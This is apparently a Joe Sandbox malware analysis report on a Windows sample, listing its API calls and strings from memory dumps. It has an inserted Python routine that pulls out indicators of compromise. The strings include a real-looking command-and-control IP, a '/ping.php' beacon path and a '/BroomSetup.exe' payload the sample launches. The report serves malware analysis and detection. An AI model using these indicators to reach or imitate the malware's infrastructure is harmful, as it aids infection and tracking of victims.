• Opcode ID: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
• Instruction ID: 6b6ed1d0d096e0b3c07b1ddeb1062277c3ef26411bea2b3bdd4595c21de0417b
• Opcode Fuzzy Hash: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
• Instruction Fuzzy Hash: 2801F976740A0027873267796C88F2F2E1BFBC126172101FCF512E2280EE20A8024A6C
Uniqueness

Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 0041EEB6
  • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
  • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
• _free.LIBCMT ref: 0041EEC8
• _free.LIBCMT ref: 0041EEDA
• _free.LIBCMT ref: 0041EEEC
• _free.LIBCMT ref: 0041EEFE
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
• Instruction ID: 4b083a6e31e8a48a8b86c3cb0939e7a8061e9024a6891407e723d3d4127bfca1
• Opcode Fuzzy Hash: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
• Instruction Fuzzy Hash: 09F04F32504310AB8A20EB6AF886E9773D9FA44764355480AFD08D7600CB38FCC0869C
Uniqueness

Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 05BCF11D
  • Part of subcall function 05BC6501: HeapFree.KERNEL32(00000000,00000000,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?), ref: 05BC6517
  • Part of subcall function 05BC6501: GetLastError.KERNEL32(?,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?,?), ref: 05BC6529
• _free.LIBCMT ref: 05BCF12F
• _free.LIBCMT ref: 05BCF141
• _free.LIBCMT ref: 05BCF153
• _free.LIBCMT ref: 05BCF165
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                  • Instruction ID: ac0a14b943f6e448c051cbbcd677c2fdc90d2a8c44a136070bd9ac4538adc33e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52F01232918604AB8B20DFA8E8C9D2B7BDAFA0475077418DDF546D7500CB31F9814E9D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004152D0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004152E2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004152F5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00415306
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00415317
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction ID: 0846cff003075c5ec292790c94e0e8fa2dbc871af0b69e12aa43d6fe7fad35b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9F0DAB18017209BCA167F19FC816893B60FB5872872271BBF919A6275CB3959818FCD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC5537
                                                                                                                                                                                                                                    • Part of subcall function 05BC6501: HeapFree.KERNEL32(00000000,00000000,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?), ref: 05BC6517
                                                                                                                                                                                                                                    • Part of subcall function 05BC6501: GetLastError.KERNEL32(?,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?,?), ref: 05BC6529
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC5549
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC555C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC556D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC557E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction ID: 5c0f65c21486ec15973545acc6382990afab5d075ba5735a809faa8aa649047a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14F017B19112208BCB266F5CFCC5A153F61FB0462032171FEF509A2278CB366A818FCE
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 0-2895899722
                                                                                                                                                                                                                                  • Opcode ID: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                  • Instruction ID: b548a9a7138a64da7a824066f4516bdc11857ebac08ae9c998b6d8d4508c541d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF51C171D40209ABDB10AFA9C945FEF7BB8AF45314F12015BE804B7292D778D981CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _strpbrk.LIBCMT ref: 0041D8A0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041D9BD
                                                                                                                                                                                                                                    • Part of subcall function 00410932: IsProcessorFeaturePresent.KERNEL32(00000017,00410904,00000016,00412B39,0000002C,00439740,0041D3CD,?,?,?,00410911,00000000,00000000,00000000,00000000,00000000), ref: 00410934
                                                                                                                                                                                                                                    • Part of subcall function 00410932: GetCurrentProcess.KERNEL32(C0000417,00412B39,00000016,00416D9C), ref: 00410956
                                                                                                                                                                                                                                    • Part of subcall function 00410932: TerminateProcess.KERNEL32(00000000), ref: 0041095D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                                                  • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                  • Opcode ID: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction ID: 8cfe7552e8cc1931d7ce14f3a793833fed444a164ef8b9e72ccff9a48bf79fb4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9251B3B1E00219AFDF14DFA9C881AEEBBB5EF48314F24416EE854E7341D6399E41CB54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _strpbrk.LIBCMT ref: 05BCDB07
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCDC24
                                                                                                                                                                                                                                    • Part of subcall function 05BC0B99: IsProcessorFeaturePresent.KERNEL32(00000017,05BC0B6B,00000016,05BC2DA0,0000002C,00439740,05BCD634,?,?,?,05BC0B78,00000000,00000000,00000000,00000000,00000000), ref: 05BC0B9B
                                                                                                                                                                                                                                    • Part of subcall function 05BC0B99: GetCurrentProcess.KERNEL32(C0000417,05BC2DA0,00000016,05BC7003), ref: 05BC0BBD
                                                                                                                                                                                                                                    • Part of subcall function 05BC0B99: TerminateProcess.KERNEL32(00000000), ref: 05BC0BC4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                                                  • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                  • Opcode ID: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction ID: 55b0e4138f0ad74e6d57e7bba3b2126b2d1744414ce4dce2b7869ee2cd5d4b98
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40514F75E0025AAFDF14DFA8C884ABEFBB5FF48210F2441EDD455E7340E675AA018B54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe,00000104), ref: 00413303
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004133CE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004133D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-36620197
                                                                                                                                                                                                                                  • Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction ID: ddf04b2862e1199f4fb1385bf4b9d3a7dff69665be34de18e7ab35541f588614
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD319571A00218AFDB219F5A9C819DEBBB8EB85315F1041ABFC14D7210DB749B81CB9C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe,00000104), ref: 05BC356A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC3635
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC363F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-36620197
                                                                                                                                                                                                                                  • Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction ID: eb8cb38689687a4c717ec2de69d823cf5eb16753d764e8b43331a1ba2a73bb62
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53319371A44258AFDB21DF999C84DAEBFFDEB84710F5084FEE40597210D770AA40CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                  • API String ID: 3519838083-3380671521
                                                                                                                                                                                                                                  • Opcode ID: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction ID: 895aa7ca95bfe32917cece0cc4021e99c0fa9e15b4dc78af84e68f763d0dcda6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E01A172A01114BBDB04AF89DC41BAEF769EF89315F10013FF805E3291D3789E4186E9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                  • API String ID: 3519838083-3380671521
                                                                                                                                                                                                                                  • Opcode ID: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction ID: 609228d4b04ee4f9b43ba3d07a5638d0f6f990607dea64742787040429ffe720
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E018772A05515ABEB05DF989C44BFEB7A8FF48610F10056AE809E3240E7F4AA408AA1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(?), ref: 05BD6509
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 05BD651D
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 05BD6526
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                  • String ID: /BroomSetup.exe
                                                                                                                                                                                                                                  • API String ID: 3837156514-1897133622
                                                                                                                                                                                                                                  • Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction ID: 3ec88795a5a94b3fcba3612418688929bc3a93c9ff0df9d7dfc3d7104c8d530e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E017C71E0021CEBDB25DF69E9449EDBFB9FF08650F00812AF805A6160EB709A45CF94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%
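The entries above are listed twice because the same function (identical Opcode ID) is present both in the PE image loaded at 00400000 and in the non-PE memory region at 05BB0000, so an unpacked copy is the one worth dumping. The strings they expose (the `/ping.php?substr=%s` beacon path, the host `185.172.128.228`, the `Installed` marker, the `/BroomSetup.exe` payload launched via ShellExecuteEx and awaited with WaitForSingleObject for 0x8000 = 32768 ms) are the indicators a responder would carve out of such a dump. The following is an added example written for this page, not code from the Joe Sandbox report or from the sample: a small string-triage routine that extracts printable ASCII runs from a dump buffer and locates the report's indicators in it. The dump buffer is constructed for the example, and the `http` scheme in `beacon_url` is an assumption, since the report shows only the host and the path format string.

```python
# Added example, not part of the Joe Sandbox report.
# Indicators are copied from the report entries above; SAMPLE_DUMP is a
# constructed stand-in for a NUL-padded string region of a memory dump.
import re
from typing import Dict, List

C2_HOST = "185.172.128.228"
C2_PATH_FMT = "/ping.php?substr=%s"          # printf-style, filled by the sample
IOC_STRINGS = [
    C2_HOST,
    C2_PATH_FMT,
    "Installed",
    "/BroomSetup.exe",
    r"C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe",  # dropped copy of the sample
]


def extract_strings(buf: bytes, min_len: int = 4) -> List[str]:
    """Return printable-ASCII runs of at least min_len bytes, like `strings -n 4`."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(buf)]


def match_iocs(buf: bytes) -> Dict[str, int]:
    """Map each indicator to the offset of its first occurrence in buf.

    Indicators that do not occur are left out, so the caller can tell
    "not in this region" apart from "found at offset 0".
    """
    hits: Dict[str, int] = {}
    for ioc in IOC_STRINGS:
        off = buf.find(ioc.encode("ascii"))
        if off != -1:
            hits[ioc] = off
    return hits


def beacon_url(substr: str, scheme: str = "http") -> str:
    """Render the beacon URL the way the sample's format string would.

    The scheme is an assumption for the example; the report only shows the
    host and the /ping.php?substr=%s path.
    """
    return f"{scheme}://{C2_HOST}{C2_PATH_FMT % substr}"


# Constructed dump region: four NUL-terminated strings, then filler that must
# not be reported (non-printable bytes and a run shorter than min_len).
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"/ping.php?substr=%s\x00"
    + b"185.172.128.228\x00"
    + b"Installed\x00\x00"
    + b"/BroomSetup.exe\x00"
    + b"\x90" * 8
    + b"ab\x00"
)

if __name__ == "__main__":
    for s in extract_strings(SAMPLE_DUMP):
        print("string:", s)
    for ioc, off in match_iocs(SAMPLE_DUMP).items():
        print(f"IOC at 0x{off:04x}: {ioc}")
    print("beacon:", beacon_url("hwid-placeholder"))
```

Run it against a real region by replacing `SAMPLE_DUMP` with the bytes of the `.sdmp` file named in the entry; a hit on `/ping.php?substr=%s` together with the host in the same region is the pair to promote into a network detection, since the rendered URL is what the beacon request will look like on the wire.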

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1036877536-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042D740,00000000,00000000,8B56FF8B,05BC4002,?,00000004,00000001,0042D740,0000007F,?,8B56FF8B,00000001), ref: 05BCB6DD
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 05BCB766
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 05BCB778
• __freea.LIBCMT ref: 05BCB781
  • Part of subcall function 05BC7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05BC7CDE
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0040CCBE
  • Part of subcall function 0040CC0B: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC3A
  • Part of subcall function 0040CC0B: ___AdjustPointer.LIBCMT ref: 0040CC55
• _UnwindNestedFrames.LIBCMT ref: 0040CCD3
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCE4
• CallCatchBlock.LIBVCRUNTIME ref: 0040CD0C
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
• API String ID: 737400349-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 05BBCF25
  • Part of subcall function 05BBCE72: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 05BBCEA1
  • Part of subcall function 05BBCE72: ___AdjustPointer.LIBCMT ref: 05BBCEBC
• _UnwindNestedFrames.LIBCMT ref: 05BBCF3A
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 05BBCF4B
• CallCatchBlock.LIBVCRUNTIME ref: 05BBCF73
Memory Dump Source
